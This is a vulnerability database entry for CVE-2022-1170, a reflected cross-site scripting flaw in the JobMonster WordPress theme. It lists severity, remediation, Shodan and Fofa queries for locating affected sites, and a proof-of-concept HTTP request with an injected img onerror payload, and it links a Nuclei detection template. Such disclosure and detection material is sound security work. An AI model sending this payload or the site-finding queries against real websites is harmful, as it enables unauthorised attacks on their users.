🔙 목록으로 돌아가기

CVE-2022-1170: JobMonster < 4.5.2.9 - Cross-Site Scripting

TitleJobMonster < 4.5.2.9 - Cross-Site Scripting
AuthorAkincibor,ritikchaddha
SeverityMedium
ImpactAttackers can inject malicious JavaScript via XSS in the search form, potentially stealing user session cookies or performing unauthorized actions.
RemediationUpgrade to JobMonster theme version 4.5.2.9 or later.
CVSS Score6.1
EPSS Score0.00931
CVE IDCVE-2022-1170
CWE IDCWE-79
Shodan Queryhttp.html:/wp-content/themes/noo-jobmonster
Fofa Querybody=/wp-content/themes/noo-jobmonster
Tags cve cve2022 wpscan wp wp-theme wordpress xss jobmonster nootheme vuln

🔍 Vulnerability Description

In the theme JobMonster < 4.5.2.9 there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.

🌐 HTTP Request

GET /resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1170.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1170.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A